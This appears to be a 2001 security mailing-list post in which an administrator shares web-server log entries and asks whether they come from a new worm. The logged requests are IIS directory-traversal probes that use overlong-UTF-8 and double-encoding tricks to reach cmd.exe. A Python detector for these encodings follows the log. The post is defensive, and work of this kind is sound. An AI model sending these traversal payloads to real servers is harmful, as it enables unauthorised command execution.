[Dshield] New one?

Martin Mueller mueller at webpartner.de
Wed Oct 17 13:05:23 GMT 2001


Hi all,

I found these log entries today on an Apache virtual web server of my company.
Sorry, the lines are very long, but all different...

Is this a new "Code Red" or something?
It does not look like the "normal" CR or Nimda to me.

The "attacking IP" is located in Brazil (if it is the real one :-) ); we are in Germany.

Best regards,

Martin Mueller
----------------------------------------
Webpartner Kommunikationsdienste GmbH
Metzstrasse 14b
81667 Muenchen

Tel: 089/480 88 89-0
Fax: 089/480 88 89-9

mueller at webpartner.de
http://www.webpartner.de
----------------------------------------
Clicked yet? http://www.urlpartner.de
Manage your favorites online
A project of Webpartner GmbH




200.199.211.50 - - [17/Oct/2001:08:10:28 +0200] "GET
/msadc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 336 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:10:28 +0200] "GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 338 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:10:29 +0200] "GET
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 340 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:10:29 +0200] "GET
/wwwroot/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 338 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:10:30 +0200] "GET
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 338 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:10:30 +0200] "GET
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 339 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:10:31 +0200] "GET
/ftproot/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 338 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:10:31 +0200] "GET
/pbserver/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 339 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:10:32 +0200] "GET
/rpc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 334 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:10:32 +0200] "GET
/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 338 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:15 +0200] "GET
/scripts/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 376 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:15 +0200] "GET
/msadc/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 374 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:15 +0200] "GET
/wwwroot/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 376 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:16 +0200] "GET
/iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 378 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:16 +0200] "GET
/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 376 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:17 +0200] "GET
/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 377 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:17 +0200] "GET
/ftproot/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 376 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:17 +0200] "GET
/pbserver/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 377 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:18 +0200] "GET
/rpc/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 372 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:19 +0200] "GET
/samples/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 376 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:22 +0200] "GET
/scripts/..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:22 +0200] "GET
/msadc/..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:23 +0200] "GET
/iisadmpwd/..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:24 +0200] "GET
/cgi-bin/..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:26 +0200] "GET
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:27 +0200] "GET
/ftproot/..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:28 +0200] "GET
/pbserver/..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:30 +0200] "GET
/rpc/..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:31 +0200] "GET
/samples/..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:34 +0200] "GET
/scripts/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:34 +0200] "GET
/msadc/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:35 +0200] "GET
/iisadmpwd/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:35 +0200] "GET
/wwwroot/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:36 +0200] "GET
/cgi-bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:36 +0200] "GET
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:38 +0200] "GET
/ftproot/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:38 +0200] "GET
/pbserver/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:39 +0200] "GET
/rpc/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:39 +0200] "GET
/samples/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 400 296 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:44 +0200] "GET
/scripts/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 350 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:44 +0200] "GET
/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 348 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:45 +0200] "GET
/iisadmpwd/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 352 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:45 +0200] "GET
/wwwroot/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 350 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:46 +0200] "GET
/cgi-bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 350 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:46 +0200] "GET
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 351 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:47 +0200] "GET
/ftproot/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 350 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:47 +0200] "GET
/pbserver/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 351 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:47 +0200] "GET
/rpc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 346 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
200.199.211.50 - - [17/Oct/2001:08:11:48 +0200] "GET
/samples/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c%20dir%20c:\
HTTP/1.1" 404 350 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
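
A detector for the five encodings in the log above, as an added example that is not part of the original post: it percent-decodes each request path until it stops changing, folds overlong two-byte UTF-8 back to ASCII (so `%c0%af` becomes `/`), and flags paths whose `..` segments climb above the URL root. The function names and the shortened sample lines are constructed for illustration.

```python
import re

# Constructed sample: one shortened request per encoding family in the log above.
TAIL = 'winnt/system32/cmd.exe?/c%20dir%20c:\\ HTTP/1.1" 404 336'
SAMPLE = ['200.199.211.50 - - [17/Oct/2001:08:10:28 +0200] "GET ' + p + TAIL for p in (
    "/msadc/..%c0%af..%c0%af/", "/scripts/..%255c..%255c/", "/scripts/..%%35c..%%35c",
    "/scripts/..%%35%63..%%35%63", "/scripts/..%25%35%63..%25%35%63")]

PCT = re.compile(rb"%([0-9A-Fa-f]{2})")
OVERLONG = re.compile(rb"[\xc0\xc1][\x80-\xbf]")  # 2-byte UTF-8 hiding an ASCII char
REQUEST = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/')

def decode_once(raw):
    """One percent-decoding pass, then fold overlong UTF-8 back to ASCII."""
    raw = PCT.sub(lambda m: bytes([int(m[1], 16)]), raw)
    out = OVERLONG.sub(lambda m: bytes([((m[0][0] & 31) << 6) | (m[0][1] & 63)]), raw)
    return out, out != raw

def normalize(path, max_passes=5):
    """Decode until stable; return (path, passes needed, saw_overlong)."""
    cur, passes, overlong = path.encode("latin-1"), 0, False
    while passes < max_passes:
        nxt, hit = decode_once(cur)
        if nxt == cur:
            break
        cur, passes, overlong = nxt, passes + 1, overlong or hit
    return cur.decode("latin-1").replace("\\", "/"), passes, overlong

def escapes_root(path):
    """True if the '..' segments climb above the URL root."""
    depth = 0
    for seg in path.split("/"):
        if seg not in ("", ".", ".."):
            depth += 1
        elif seg == ".." and (depth := depth - 1) < 0:
            return True
    return False

def classify(line):
    """Return a verdict dict for one access-log line, or None if unparsable."""
    m = REQUEST.match(line)
    if not m:
        return None
    path, passes, overlong = normalize(m[2].split("?", 1)[0])
    kind = "overlong-utf8" if overlong else "multi-decode" if passes > 1 else "plain"
    return {"ip": m[1], "path": path, "kind": kind, "traversal": escapes_root(path)}

if __name__ == "__main__":
    print(*map(classify, SAMPLE), sep="\n")
```
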





